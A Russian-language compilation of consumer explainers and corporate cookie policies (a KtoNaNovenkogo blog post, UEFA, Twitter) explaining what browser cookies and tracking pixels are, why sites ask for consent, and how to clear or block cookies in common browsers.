Содержание

Что такое cookie файлы и почему почти на каждом сайте спрашивают согласен ли я на их использование?

Не столько печеньки, сколько небольшие записи, хранимые ограниченное время на стороне клиента в протоколе HTTP/s, переданные сервером(сайтом).

Изначально файлы cookie действительно использовались для таких рутинных и простых операций, как идентификация на сайте. Пользователю стоит только однажды ввести логин и пароль, и сервер «запоминает» его, высылая ему нужную cookie-запись, которая является парой ключ=значение. В следующий раз, браузер будет всегда отправлять эту запись cookie (ключ=значение) при запросах на сервер, так сервер может отличать разных посетителей на основе их предыдущих действий (не только ввод пароля — куки могут хранить настройки пользователя, например регион/страну или выбранный язык). Конечно, все немного хитрее чем вам кажется — ключем куки не является ваш логин, а пароль не передается в ее значении — есть более безопасный механизм сессий на случай, если куки украдут.

Однако, с течением времени, появились более изощренные и менее очевидные способы использования кук. Например, они используются для того, что бы отслеживать (track) действия пользователя в пределах сайта, а еще позже — отслеживать сайты, которые пользователь посещает. Это стало возможным благодаря развитию JavaScript и крупным платформам вроде Google Analytics (аналогично и Яндекс.Метрики), и сотням других чуть менее популярных сервисов, скриптов, приложений, устанавливаеых на сайт. Так, эти платформы умеют точно сопоставлять, что вы искали в интернете и что вы далее сделали, перейда на сайт, на какой из нажатых ссылок в выдаче ваш сеанс был наиболее долгим, что используется в том числе для повышения релевантности ссылки по вашему запросу.

Вы можете посмотреть куки в вашем браузере, например в настройках содержимого в браузере Chrome (All cookies and site data). Вы увидите, что в основном, куки имеют бесполезные значения и почти бесполезные имена ключей, потому что вся магия делается наименее очевидной и выносится в back-end (на сервер), который получает куки при каждом обращении к хосту.

Режим инкогнито (и другие аналоги «приватного» режима) основаны именно на том, что браузер создает новую временную базу данных (в которой нет старых кук), и забывает все новые куки, полученные в ходе сеанса (ну и историю не записывает).

В соглашении о приватности (privacy agreement) на различных сайтах вас предупреждают, что сайт использует cookies потому, что технически это позволяет получить исчерпывающую информацию о ваших действиях на этом сайте, хотя сам протокол HTTP анонимен.

Что такое cookie и как почистить куки в современных браузерах

Главная / ЧАстые ВОпросы

8 января 2021

  1. Что такое куки — мифы и реальность
  2. Как почистить, включить или отключить куки?

Здравствуйте, уважаемые читатели блога KtoNaNovenkogo.ru. Практически сразу любой начинающий интернетчик сталкивается с таким понятием как cookie. Что означает это загадочное слово? Почему их иногда чистят? Чем отличаются сторонние куки от прямых? Как их включить или выключить? А главное — зачем?

Нет, мы, конечно же, на уровне подсознания понимаем, что это вещь нужная, раз о ней все говорят, но все же было бы неплохо капнуть чуть-чуть поглубже, чтобы отделить правду от вымысла и развеять часть мифов связанных с этими загадочными куками. Ну и попутно понять их назначение, чтобы чистить, включать и настраивать их прием в браузере со знанием дела.

Что такое куки — мифы и реальность

Если говорить простым языком, то cookie это всего лишь фрагменты данных, которыми обмениваются ваш браузер и веб-сервера, на которых расположены посещаемые вами сайты (что это такое?). Дело в том, что протокол http устроен так, что при каждом обращении к новой странице одного и того же сайта, ваш браузер как бы заново знакомится с сервером и все, что вы делали на страницах сайта чуть раньше, будет забыто напрочь.

Казалось бы, ну и что такого… Однако, большая часть сайтов работать без такой вещи как куки не смогут. Точнее смогут, но потеряют часть своего функционала.

Например, если для работы на сайте требуется авторизация, то вам при каждом переходе на новую страницу придется заново вводить логин и пароль:

  1. Пользователь вводит имя и пароль в форму входа расположенную на сайте и отправляет их на сервер.
  2. Сервер получает их и проверяет на правильность, после чего отдает браузеру запрошенную пользователем страницу. Но вместе с ее кодом браузер получает cookie с идентификатором сессии. Как правило, они будут храниться в браузере какое-то время, в течении которого пользователь сможет работать с сайтом без повторной авторизации.
  3. При запросе других страниц сайта у сервера, браузер вместе с кодом запроса отправляет и куки с идентификатором сессии. Сервер проверяет идентификатор по своей базе и, при благоприятном стечении обстоятельств, отдает код запрашиваемой страницы.

А в интернет-магазине вы вообще ничего не сможете купить, ибо без cookie не будет работать «виртуальная корзина» для хранения покупок.

Что примечательно, разработка стандарта cookie началась именно для реализации корзины в пакете предназначенном для интернет коммерции. Происходило это в начале девяностых годов прошлого века авторами сейчас уже забытого всеми браузера Netscape. Потом стандарт пересматривался в связи с тем, чтобы попытаться ограничить использование куков для сбора личных данных о пользователях браузеров.

Также куки могут использоваться для хранения настроек, которые пользователь сделал на сайте. Например, в настройках поиска Яндекса вы можете задать количество ответов, которое будет показываться и величину сниппетов. Эти данные будут храниться в вашем браузере и применяться каждый раз, когда вы осуществляете поиск.

В общем, куки в большинстве случаев нужны и полезны. Но по-прежнему не утихают споры по поводу того, что сторонние куки создают угрозу приватности пользователя. Откуда берутся эти самые сторонние cookie и что это такое? Дело в том, что при загрузке (отрисовке) вебстраницы данные могут подгружаться не только с того сервера, где, собственно, расположен сайт, но и со сторонних серверов.

Примерами таких вещей могут быть счетчики посещений, скрипты подгрузки блоков контекстной рекламы, различные изображения хранящиеся не на основном сайте. И все это богатство при загрузке может передавать браузеру свои куки, которые и будут в этом случае называться сторонними. Именно их обычно и опасаются в плане нарушения конфиденциальности.

Однако, в настройках некоторых браузеров подгрузку сторонних cookie можно разрешить, ибо по умолчанию она блокируется из соображений безопасности. В этом плане в различных обозревателях интернета можно встретить примерно такой набор возможностей:

  1. Полное отключение куки.
  2. Очистка всех cookie при выходе из браузера.
  3. Запрет или ограничение на использовании сторонних куков
  4. Создание «белого» и/или «чёрного» списка сайтов, cookie с которых будут либо пропускаться, либо блокироваться.
  5. У некоторых браузеров имеется даже менеджер для очистки эти записей для отдельных сайтов.
  6. Установка ограниченных сроков истечения куки.

По поводу последнего пункта. Дело в том, что существуют записи cookie, которые сами удаляются при окончании вашего сеанса работы с тем или иным сайтом. Однако, у разработчиков сайтов есть возможность указать срок жизни эти записей, по истечении которого они будут почищены. Такие куки называются постоянными и именно об ограничении их срока жизни идет речь в последнем пункте. Хранятся они обычно в отдельном файле, который может называться cookies.txt.

Теперь давайте развеем несколько мифов, которыми обросли кукисы:

  1. Cookie идентифицируют не конкретного человека (вас), а отдельные браузеры. Открыв страницу того же самого сайта в другом браузере, вас попросят авторизоваться заново, ибо куков, говорящих о производимой ранее авторизации в данном обозревателе, не будет иметься. Если браузером пользуются несколько человек, то опять же эта технология не будет делать для них различия.
  2. Куки не являются программами (это обычный текстовый фрагмент), поэтому они не могут быть источниками заражения ваших компьютеров вирусами и сами вирусами тоже быть не могут.
  3. Также они не имеют ничего общего с всплывающими самопроизвольно в браузере окнами. Эти вещи отключаются в разных настройках обозревателя.

Теперь перечислим то, что действительно cookie могут делать:

  1. С помощью них можно отследить, какие именно страницы вы посещали, и срок хранения этих данных может быть весьма высок. Спецслужбы самой демократичной страны в мире когда-то обвинялись в использовании куков для слежки и получения конфиденциальных данных таким образом.
  2. Если трафик передаваемый с вашего компьютера в сеть интернет не шифруется, то злоумышленники могут его перехватить и в том числе прочитать cookie (перехватить или подменить). Чаще всего это происходит при использовании WiFi без шифрования.
  3. Cookie также могут устанавливаться программами на языках типа JavaScript, встроенными в текст страниц, или другими скриптами работающими в браузере (т.е. без получения этих данных с сервера).
  4. На данный момент у этой технологии есть альтернативные решения, но куки по-прежнему остаются оптимальным вариантом по совокупности имеющихся у них возможностей

Как почистить, включить или отключить куки?

Бывают случаи, когда нужно почистить cookie оставленные вами после сеанса пользования интернетом. Например, если вы авторизовались на каких-то сайтах, но при этом работали с чужого компьютера (в гостях, на работе, в интернет-кафе и т.п.). Если куки оставить, то другой пользователь вполне может войти на тот же сайт и попасть в ваш аккаунт, сам того не желая.

Кстати, на многих сайтах сейчас, при вводе логина и пароля, можно поставить галочку «Чужой компьютер», чтобы информация об авторизации не сохранялась в cookie. Ну и также во всех современных браузерах имеется режим «Инкогнито» или приватного путешествия по сети, когда на компьютере не остается никаких следов вашего пребывания.

Кроме этого, куки может понадобиться почистить если возникает проблема с открыванием каких-либо страниц. Конечно же, первым шагом будет очистка кэша в Хроме, Опере или Мазиле, но если это не поможет, то придется пойти дальше и выполнить описанные ниже действия.

  1. В старой Опере (до версии 12.16) нужно выбрать из верхнего меню кнопки «Опера» пункты «Настройки» — «Общие настройки». В открывшемся окне перейти на вкладку «Расширенные», а затем выбрать в левом меню пункт «cookie».

    Здесь можно включить и выключить прием куки вообще или только с посещаемого сайта (т.е. сторонние записи приниматься не будут). Тут же имеется и менеджер, который позволит удалить или изменить записи cookie для каждого из посещенных вами сайтов в отдельности.

    Если хотите просто почистить куки, то выбираете из верхнего меню Оперы пункты «Настройки» — «Удалить личные данные», а на открывшейся вкладке сможете почистить либо все cookie, либо только те, что было получены в последнем сеансе работы с браузером:

  2. В новой Опере (с номером версии выше 12.16) нужно будет из меню кнопки «Opera» выбрать пункты «Другие инструменты» — «Очистить историю посещений»:

    На открывшейся вкладке достаточно будет поставить галочку в поле «Удалить cookies и прочие данные сайта» и нажать на кнопку «Очистить» расположенную ниже:

  3. В интернет-обозревателе Chrome и бесплатном Яндекс Браузере просто нажмите сочетание клавиш Ctrl+Shift+Delete, после чего в открывшемся окне поставьте галочку в поле «Удалить cookies и прочие данные сайта» и нажмите на кнопку «Очистить историю» расположенную ниже.Да, еще вы можете выбрать период времени, за который будут почищены куки описанным выше способом.
  4. В Мозиле (firefox) нужно будет нажать сочетание клавиш Ctrl+Shift+Delete, либо выбрать из верхнего меню кнопки «Firefox» пункты «Журнал» — «Удалить недавнюю историю».В открывшемся окне достаточно поставить галочку в поле «Куки», выбрать период, за который их нужно будет почистить, и нажать на кнопку «Удалить сейчас».
  5. В Интернет Эксплорер для очистки куков можно будет нажать уже знакомую нам комбинацию клавиш: Ctrl+Shift+Delete.Затем нужно поставить галочку в строке «Куки-файлы» и нажать на расположенную внизу кнопку «Удалить».

Удачи вам! До скорых встреч на страницах блога KtoNaNovenkogo. ru

Использую для заработка

Что такое куки

Если вы зашли в соц­сеть, потом выклю­чи­ли ком­пью­тер, вклю­чи­ли и сно­ва зашли, то вто­рой раз пароль у вас, ско­рее все­го, соц­сеть не спро­сит. Пото­му что она оста­ви­ла в вашем ком­пью­те­ре куки и теперь поль­зу­ет­ся этим.

Что такое куки?

Куки — это рус­ское про­из­но­ше­ние англий­ско­го «cookie», кото­рое пере­во­дит­ся как «пече­нье». В ИТ-мире куки — это малень­кий файл с дан­ны­ми, кото­рый хра­нит­ся у вас на ком­пью­те­ре. Обыч­но в нём хра­нят дан­ные о том, был ли уже поль­зо­ва­тель на этом сай­те, и если да — то под каким име­нем и что там делал.

Куки — это программа?

Нет. Куки не могут выпол­нить­ся сами по себе, что-то сде­лать или уда­лить важ­ный файл. Это про­сто текст, кото­рый лежит на ком­пью­те­ре. Когда у куки закан­чи­ва­ет­ся срок год­но­сти, бра­у­зер её уда­ля­ет, но есть бес­сроч­ные куки: они сами не уда­ля­ют­ся, но и не вре­дят при этом компьютеру.

Един­ствен­ное, что дела­ет куки — хра­нит нуж­ную инфор­ма­цию для сайта.

Наш сайт использует куки — что это значит?

Это зна­чит, что сайт хочет запом­нить что-то свя­зан­ное с вами: факт посе­ще­ния, ваш логин, запол­не­ние форм анке­ты или что вы поло­жи­ли в корзину.

При этом куки не кра­дёт какие-то дан­ные или зале­за­ет к вам в систе­му и смот­рит, какие фай­лы у вас там хра­нят­ся. Всё, что хочет сайт — это ска­зать: «Ува­жа­е­мый, мы хотим запом­нить, что ты — это ты, или что ты делал на нашем сай­те. Для это­го мы поло­жим тебе на жёст­кий диск спе­ци­аль­ный фай­лик, кото­рый помо­жет нам в этом».

У каж­до­го сай­та свои куки, поэто­му в сум­ме их полу­ча­ет­ся мно­го. Но так как каж­дый такой файл не может зани­мать боль­ше четы­рёх кило­байт, это не так уж страшно.

Почему все сайты это пишут?

Тако­вы пра­ви­ла GDPR — Евро­пей­ско­го регла­мен­та по защи­те дан­ных. Если сайт исполь­зу­ет­ся или может исполь­зо­вать­ся жите­ля­ми Евро­со­ю­за, то он дол­жен пре­ду­пре­дить чита­те­ля о том, что будет при­ме­нять куки для сво­их нужд.

Мно­гие рос­сий­ские сай­ты сотруд­ни­ча­ют с евро­пей­ски­ми ком­па­ни­я­ми, поэто­му с их точ­ки зре­ния попа­да­ют под дей­ствие GDPR, а зна­чит, долж­ны инфор­ми­ро­вать поль­зо­ва­те­ля и выво­дить такое сообщение.

Если такой над­пи­си нет, то сайт не исполь­зу­ет куки или на него не рас­про­стра­ня­ет­ся дей­ствие GDPR. Или рас­про­стра­ня­ет­ся, но вла­дель­цу сай­та на это напле­вать. Пра­ви­ло такое: если над­пись есть — сайт точ­но исполь­зу­ет куки. Если над­пи­си нет — ско­рее все­го, тоже, про­сто сайт об этом не говорит.

Зачем нужны куки?

Основ­ная зада­ча — помо­гать сай­там запо­ми­нать о вас какую-то инфор­ма­цию, например:

  • логин и пароль,
  • содер­жи­мое кор­зи­ны в интернет-магазине,
  • вре­мя послед­не­го посещения,
  • язык, кото­рый исполь­зу­ет­ся в системе,
  • были ли вы уже на сай­те или нет.

Такой набор дан­ных помо­га­ет рекла­мо­да­те­лям отсле­жи­вать сай­ты, кото­рые вы посе­ща­е­те, и делать на осно­ве это­го какие-то выво­ды. Если соби­рать куки доста­точ­но дол­го, мож­но полу­чить о чело­ве­ке мно­го инфор­ма­ции.

Если их отключить — следить перестанут?

Нет.

Даже если вы отклю­чи­те куки, сай­ты могут про­дол­жить сле­дить за вами с помощью:

  • Строк запро­сов в URL, когда дан­ные о поль­зо­ва­те­ле встра­и­ва­ют­ся пря­мо в URL-адрес.
  • Скры­тых полей форм, так как никто не меша­ет сай­там делать скры­тые фор­мы, писать в них дан­ные, а потом отправ­лять на свой сервер.
  • Сохра­не­ния дан­ных сред­ства­ми само­го бра­у­зе­ра, напри­мер в localstorage. Даже мы это дела­ли в сво­ей программе-тудушке и в осталь­ных про­ек­тах.
  • JSON-токенов. Это как куки, толь­ко их никто не запрещает.
  • DOM-архитектуры стра­ни­цы — спо­со­ба встро­ить нуж­ные дан­ные в сам код сайта.
  • Кеша бра­у­зе­ра — как localstorage, толь­ко в дру­гом месте.

Как избавиться от куки?

Исполь­зо­вать режим «инког­ни­то» в бра­у­зе­ре или перей­ти в настрой­ки при­ват­но­сти бра­у­зе­ра и при­ну­ди­тель­но отклю­чить при­ём куки с сайтов.

Есть пла­ги­ны, кото­рые очи­ща­ют куки после посе­ще­ния каж­дой стра­ни­цы или после закры­тия браузера.

А ещё мож­но запу­стить спе­ци­аль­ную про­грам­му, кото­рая сама будет искать все куки на ком­пью­те­ре и уда­лять их.

Что будет без куки?

В общем слу­чае — сай­ты пере­ста­нут вас пом­нить и авто­ма­ти­че­ски вхо­дить по логи­ну и паро­лю. Каж­дый раз нуж­но будет логи­нить­ся зано­во, даже если слу­чай­но закро­е­те окно браузера.

Ещё неко­то­рые сай­ты могут начать рабо­тать непра­виль­но, напри­мер, те, в кото­рых что-то нуж­но сде­лать за несколь­ко шагов. Если на сай­те есть три шага по настрой­ке лич­но­го каби­не­та и на каж­дом шаге пере­за­гру­жа­ет­ся стра­ни­ца, то сайт может не сохра­нить важ­ные дан­ные и всё надо начи­нать сначала.

Информация о cookie | UEFA.com

УЕФА
Союз европейских футбольных ассоциаций
Route de Genève 46
Case postale
CH-1260 Nyon 2
Швейцария


I. Введение

Сайт и приложения УЕФА («Платформы УЕФА») находятся в ведении Союза европейских футбольных ассоциаций («УЕФА» или «мы»).

Когда вы открываете платформы УЕФА, данные, связанные с посещенными страницами, могут сохраняться на устройстве, которое использовалось для доступа к платформам УЕФА, в так называемых файлах cookie или посредством схожих технологий, таких как пиксели отслеживания. Этот документ поясняет, что такое файлы cookie и пиксели отслеживания, какие cookie и пиксели отслеживания мы используем, для чего они нужны и как вы можете менять свои настройки, чтобы управлять файлами cookie и пикселями отслеживания, которые мы используем.

Эти правила в отношении cookie следует читать вместе с нашими правилами конфиденциальности УЕФА, где рассказано, как и почему мы собираем, храним, используем и передаем личную информацию в целом, а также перечислены ваши права в отношении вашей личной информации и подробности о том, как связаться с нами и соответствующими надзорными органами, если у вас есть жалоба.

Мы можем время от времени менять эти правила в отношении cookie и публиковать обновленные версии на соответствующих платформах УЕФА вместе с уведомлениями об изменениях, когда это необходимо.

II. Что такое файлы cookie?

Cookie – это текстовые файлы, которые, в зависимости от ваших настроек, могут сохраняться на жестком диске устройства (компьютера, планшета, мобильного телефона или другого устройства с доступом к Интернету), когда вы открываете какой-нибудь сайт или нажимаете на рекламный баннер. Файлы cookie используются для идентификации того устройства, на котором сохранены, и действуют в течение ограниченного срока.

III. Почему мы используем файлы cookie?

Есть пять типов cookie, которые могут сохраняться на ваше устройство при посещении платформ УЕФА. Предназначение каждого типа файлов cookie описано ниже.

1. Обязательные файлы cookie
Обязательные файлы cookie помогают платформам УЕФА работать благодаря обеспечению основных функций, необходимых для навигации по сайту, доступа к защищенным областям, проверки подлинности при входе в систему и использования контактных форм, а также для других расширенных функциональных возможностей. Файлы cookie этого типа нельзя отключить. Вы можете настроить свой браузер так, чтобы он блокировал или предупреждал вас о них. Но если вы их блокируете, то некоторые элементы платформ УЕФА не будут работать.

2. Сессионные файлы cookie
Сессионные файлы cookie (также известные как сеансовые) позволяют платформам УЕФА связывать ваши действия во время отдельного сеанса браузера. Такие файлы cookie удаляются каждый раз, когда вы закрываете браузер, и после этого не хранятся на вашем устройстве.

3. Постоянные файлы cookie
Постоянные файлы cookie хранятся на вашем устройстве между сеансами браузера. Они используются, чтобы запоминать ваши предпочтения или действия на платформах УЕФА – например, товары, которые вы просматривали и добавляли в корзину при посещении магазина УЕФА. Эти файлы cookie остаются на вашем устройстве до истечения срока их действия или до тех пор, пока вы их не удалите.

4. Эксплуатационные файлы cookie
Эксплуатационные файлы cookie позволяют нам подсчитывать посещения страниц и источники трафика, благодаря чему мы можем измерять и повышать эффективность работы платформ УЕФА. Они помогают нам, какие страницы посещают чаще, а какие реже, и показывают перемещения пользователей по сайту. Вся информация, которую собирают эти файлы cookie, обобщается и поэтому остается анонимной; она используется только для улучшения работы платформ УЕФА. Если вы запретите использовать такие файлы cookie, мы не будем знать о ваших посещениях платформ УЕФА и не сможем отслеживать их эффективность.

5. Целевые файлы cookie
Целевые файлы cookie могут отправляться через платформы УЕФА нашими рекламными партнерами, чтобы изучать ваши интересы и показывать вам наиболее уместную рекламу на других сайтах. Они непосредственно не хранят личную информацию, а основаны на уникальной идентификации вашего браузера и устройства для доступа в Интернет. Если вы запретите использовать эти файлы cookie, то будете получать менее актуальную для вас рекламу.

IV. Что такое пиксели отслеживания?
В дополнение к описанным выше типам файлов cookie платформы УЕФА могут использовать так называемые пиксели отслеживания, чтобы определять эффективность различных компонентов платформ УЕФА (включая рекламные компоненты). Это очень маленькие изображения размером 1х1 пиксель, встроенные в код платформ УЕФА.
При посещении платформ УЕФА пиксели отслеживания отправляют на пиксель-сервер ограниченный объем информации. Эта информация используется исключительно для статистических целей в отношении (i) количества уникальных пользователей платформ УЕФА, (ii) количества и типа посещенных страниц, а также (iii) эффективности рекламных стратегий. Собранная информация может включать, например, местоположение просмотренных в браузере матчей, даты просмотренных в браузере матчей, язык браузера, категории просмотренных в браузере билетов, ваш IP-адрес и данные о вашем местонахождении (например, страна проживания).

V. Какие файлы cookie и пиксели отслеживания мы используем

В приведенной ниже таблице представлена дополнительная информация о том, какие файлы cookie и пиксели отслеживания мы используем и зачем:

VI. Согласие на использование файлов cookie или пикселей отслеживания
Мы запрашиваем у вас разрешение (согласие) на размещение файлов cookie, пикселей отслеживания и любых подобных технологий на вашем устройстве, кроме тех случаев, когда они необходимы для предоставления запрошенной вами услуги (например, чтобы вы могли поместить товары в вашу корзину покупок и воспользоваться процедурой оформления заказа).
На платформах УЕФА есть уведомление, где описывается, как мы используем файлы cookie, и запрашивается ваше согласие на их размещение на вашем устройстве.

VII. Как управлять файлами cookie и пикселями отслеживания?

1. Изменение настроек через наш Центр предпочтений файлов cookie
Этот центр можно использовать для настройки предпочтений в отношении файлов cookie в любое время в соответствии с вашими потребностями и предпочтениями. Центр регистрирует ваше согласие и контролирует действие эксплуатационных и целевых файлов cookie при использовании платформ УЕФА.

Если вы хотите ограничить или заблокировать использование файлов cookie в целом, то можете настроить свой браузер так, чтобы при каждом сохранении файла cookie появлялось предупреждение. Кроме того, вы можете заблокировать все файлы cookie. Вы также можете вручную удалить любые файлы cookie, уже отправленные через ваш браузер. О том, как это сделать, читайте ниже, в пунктах 2 и 3.

Для удобства навигации УЕФА рекомендует принимать файлы cookie на платформах УЕФА и не удалять их. В противном случае некоторые функции платформ УЕФА могут не отображаться или не работать должным образом.

2. Настройки в разных браузерах
Управление файлами cookie зависит от браузера. Чтобы войти в настройки файлов cookie в вашем браузере, откройте в нем Справку или нажмите соответствующую ссылку ниже:

3. Сторонние файлы cookie и как их заблокировать
Вы также можете заблокировать определенные типы файлов cookie без изменения настроек браузера.

a. Блокировка файлов cookie, предназначенных для измерения аудитории
На наш сайт такие файлы cookie добавляет Google Analytics. Вы можете заблокировать их, если перейдете по приведенной ниже ссылке, загрузите дополнение и установите его в свой браузер. Это дополнение совместимо с Internet Explorer, Chrome, Firefox, Safari и Opera.
Ссылка для отключения Google Analytics: Блокировщик Google Analytics
Учтите, что само дополнение тоже сохраняет на ваше устройство файл cookie, но он используется исключительно для того, чтобы ваш браузер перестал передавать данные в Google Analytics.
Подробнее об отключении Google Analytics и установке дополнения для браузера можно узнать здесь: Блокировщик Google Analytics

Подробнее о правилах конфиденциальности Google Analytics можно узнать здесь: Безопасность ваших данных

b. Блокировка файлов cookie социальных сетей
Чтобы заблокировать файлы cookie, используемые социальными сетями (например, через кнопку «Поделиться»), следуйте указаниям по соответствующим ссылкам:

4. Пиксели отслеживания и как их заблокировать
Блокировка файлов cookie не ведет к автоматическому прекращению отправки информации на пиксель-сервер через пиксели отслеживания. Вы можете блокировать это, настроив браузер так, чтобы он максимально ограничивал внешнюю графику, с помощью соответствующих настроек брандмауэра и (или) определенных расширений для браузера. Однако это может ограничить другие функции.

VIII. Как связаться с нами
Если у вас есть вопросы о наших правилах в отношении cookie или вашей персональной информации, которую мы храним, напишите нам по адресу: [email protected]

Использование файлов cookie и аналогичных технологий

В наших службах используется файлы cookie и аналогичные технологии, такие как пиксели и локальное хранилище, чтобы сделать вашу работу удобнее, быстрее и безопаснее. Вот несколько способов использования этих технологий нашими службами, такими как веб-сайты, SMS, API, почтовые уведомления, приложения, кнопки, виджеты и рекламные объявления: вход в Твиттер и Periscope, сохранение параметров, персонализация контента, защита от спама и оскорблений, отображение соответствующих вашим интересам рекламных объявлений.

Далее мы расскажем, как Твиттер, наши партнеры и сторонние компании используют эти технологии, а также расскажем о настройках конфиденциальности и других доступных функциях.

Что такое файлы cookie, пиксели и локальное хранилище?

Cookie — это небольшие файлы, которые веб-сайты размещают на вашем компьютере при просмотре сайтов. Как и многие другие веб-сайты, Твиттер, Periscope и другие наши службы используют файлы cookie для сбора информации об использовании наших служб, чтобы затем оптимизировать их работу.

Пиксель — это небольшой фрагмент кода на веб-странице или в почтовом уведомлении. Как и многие другие службы, Твиттер использует пиксели, чтобы узнать, взаимодействовали ли вы с определенным веб-контентом или почтовым уведомлением. Это помогает нам оценивать и повышать качество наших служб и персонализировать ваше взаимодействие с ними.

Локальное хранилище — это стандартная технология, позволяющая веб-сайту или приложению сохранять информацию локально на компьютере или мобильном устройстве. Мы используем локальное хранилище, чтобы настраивать отображаемые сведения на основе ваших прошлых взаимодействий с нашими службами.

Почему наши службы используют эти технологии?


Наши службы используют эти технологии для предоставления, измерения и улучшения наших служб различными способами. Эти технологии обычно используются в следующих категориях действий.

  • Проверка подлинности и безопасность:
    • Вход в Твиттер и Periscope.
    • Обеспечение вашей безопасности.
    • Просмотр контента с ограничениями на распространение.
    • Обнаружение и устранение спама, оскорблений и других действий, нарушающих Правила Твиттера и Правила сообщества Periscope.
    • Например, эти технологии помогают проверять подлинность доступа к Твиттеру и Periscope и предотвращать несанкционированный доступ к вашей учетной записи. Они также позволяют показывать вам соответствующий вашим интересам контент в наших службах.
  • Параметры:
    • Сохранение информации о вашем браузере и ваших предпочтениях.
    • Например, с помощью cookie мы запоминаем предпочитаемый вами язык или страну, в которой вы находитесь. Так мы можем показывать контент на нужном языке, не спрашивая вас об этом каждый раз, когда вы посещаете Твиттер или Periscope. В Твиттере мы также можем адаптировать контент в зависимости от страны, например показывать актуальные для страны темы или закрывать доступ к определенному контенту на основе местных законов. Дополнительные сведения об актуальных темах и контенте, к которому закрыт доступ в определенной стране.
  • Аналитика и исследования:
    • Возможность понять, как люди используют наши службы, в том числе кнопки и виджеты Твиттера, а также рекламу в Твиттере, чтобы улучшить их.
    • Например, файлы cookie помогают нам тестировать разные версии наших служб, чтобы понять, какие функции или контент предпочитают пользователи. Мы также можем оптимизировать и улучшать работу Твиттера и Periscope, используя cookie, чтобы узнавать, как вы взаимодействуете с нашими службами, например когда и как часто вы их используете и по каким ссылкам вы переходите. Мы можем использовать службу Google Analytics для решения этой задачи. Дополнительные сведения о файлах cookie, которые вы можете встретить в связи с использованием нами Google Analytics. Мы можем также использовать файлы cookie для подсчета количества пользователей, просмотревших конкретный встроенный твит или ленту. Дополнительные сведения об аналитических файлах cookie, используемых виджетами сервиса «Твиттер для веб-сайтов».
  • Персонализированный контент:
    • Возможность настроить наши службы для показа более релевантного контента, например индивидуальных актуальных тем, историй, рекламных объявлений и рекомендаций.
    • Например, локальное хранилище сообщает нам, какие разделы своей ленты Твиттера или глобальной ленты Periscope вы уже просмотрели, чтобы мы могли показать вам новый контент. Файлы cookie помогают нам более точно рекомендовать пользователей, которых вы, вероятно, будете с удовольствием читать, на основе просмотра веб-сайтов со встроенными компонентами Твиттера, включая встроенные ленты.
  • Реклама:
    • Возможность показывать рекламу, измерять ее эффективность и делать ее более актуальной для пользователей на основании данных об их действиях в Твиттере и посещениях веб-сайтов партнеров.
    • Например, мы используем файлы cookie и пиксели для персонализации рекламы и измерения ее эффективности. С помощью этих технологий мы можем показывать вам рекламные объявления и оценивать их эффективность на основе посещений веб-сайтов наших партнеров. Это помогает рекламодателям предоставлять высококачественную рекламу и контент, которые могут вас заинтересовать.
    • Мы также сотрудничаем со сторонними рекламными партнерами, в том числе Google, которые занимаются маркетингом наших услуг и показывают рекламу от имени наших рекламодателей, в том числе с помощью показа контекстных рекламных объявлений.
  • Персонализация на разных устройствах:
    • Получив больше данных о взаимосвязи устройств, мы сможем использовать информацию с одного устройства для персонализации Твиттера на другом устройстве.
    • Когда вы входите в Твиттер на своем устройстве, мы связываем это устройство с вашей учетной записью в Твиттере. Независимо от того, вошли вы в Твиттер или нет, мы также можем получать информацию о ваших устройствах в следующих случаях (список не полный): партнер предоставил нам эту информацию; вы зашли на сайт twitter.com; вы зашли на сторонний сайт, на котором используется встроенный контент Твиттера; вы зашли на сайт рекламодателя Твиттера или в мобильное приложение рекламодателя. Мы можем использовать эту информацию (чаще всего IP-адреса и время получения информации) для установления связи между различными устройствами, включая те, на которых вы входили в Твиттер. Чтобы узнать об устройствах, связанных с вашей учетной записью, откройте раздел Ваши данные в Твиттере после входа в систему. Чтобы узнать о других устройствах, связанных с данным устройством или браузером, который вы используете в настоящий момент, откройте раздел Ваши данные в Твиттере после выхода из системы.

Где используются эти технологии?

Мы (совместно с третьими лицами) используем эти технологии на наших веб-сайтах, в наших приложениях и службах, а также на других веб-сайтах, в других приложениях и службах, интегрированных с нашими службами (в том числе на сторонних объектах, применяющих нашу рекламную технологию). К ним относятся сайты наших рекламных партнеров, а также сайты, использующие наши встроенные компоненты, включая встроенные ленты. Сторонние компании также могут использовать эти технологии, например, когда вы переходите по ссылкам на наших веб-сайтах или в наших приложениях, просматриваете материалы сторонних компаний или взаимодействуете с ними в рамках наших служб, а также посещаете сторонние веб-сайты, использующие нашу рекламную технологию.

Какие существуют параметры конфиденциальности?

Мы стремимся предоставить вам действенные способы обеспечения конфиденциальности. Вам доступен ряд параметров, позволяющих управлять тем, как мы, наши партнеры и сторонние компании используют файлы cookie.

Уведомление об использовании файлов куки (cookie) и похожих технологий

Мы используем файлы cookie, чтобы анализировать трафик, подбирать для вас подходящий контент и рекламу, а также дать вам возможность делиться информацией в социальных сетях. Мы передаем информацию о ваших действиях на сайте в обезличенном виде нашим партнерам: социальным сетям и компаниям, занимающимся рекламой и веб-аналитикой. Наши партнеры могут комбинировать эти сведения с предоставленной вами информацией, а также данными, которые они получили при использовании вами их сервисов. Продолжая пользоваться данным сайтом, вы подтверждаете свое согласие на использование файлов cookie в соответствии с настоящим уведомлением.

Файлы cookie

Файл cookie – это небольшой фрагмент текста, передаваемый в браузер с сайта, который вы посетили. Он помогает сайту запомнить информацию о вас, например то, на каком языке вы предпочитаете его просматривать. Это будет полезно при следующем посещении этого же сайта. Благодаря файлам cookie просмотр сайтов становится значительно более удобным.

Файлы cookie используются для многих целей. Например, они позволяют сохранять настройки Безопасного поиска, показывать полезные рекламные объявления, подсчитывать количество посещений страницы, регистрироваться в наших службах и защищать данные пользователей.

На нашем сайте используются различные типы файлов cookie:

  • Строго необходимые файлы cookie. Эти файлы cookie нужны, чтобы сайт работал правильно, они делают возможной навигацию по ресурсу. Файлы этого типа не идентифицируют вас как личность. Если вы не согласны использовать этот тип файлов, это может оказать влияние на производительность веб-сайта, или его компонентов.
  • Файлы cookie, относящиеся к производительности, эффективности и аналитике. Эти файлы помогают понять, как посетители взаимодействуют с сайтом, предоставляя информацию о тех областях, которые они посетили и количестве времени, которое они провели на сайте, также они показывают проблемы в работе интернет-ресурса, например, сообщения об ошибках. Это помогает улучшать работу сайта. Файлы cookie, относящиеся к аналитике, также помогают измерять эффективность рекламных кампаний и оптимизировать содержание сайтов для тех, кого заинтересовала наша реклама. Данный тип файлов cookies не может быть использован для вашей идентификации. Вся информация, которая собирается и анализируется, анонимна.
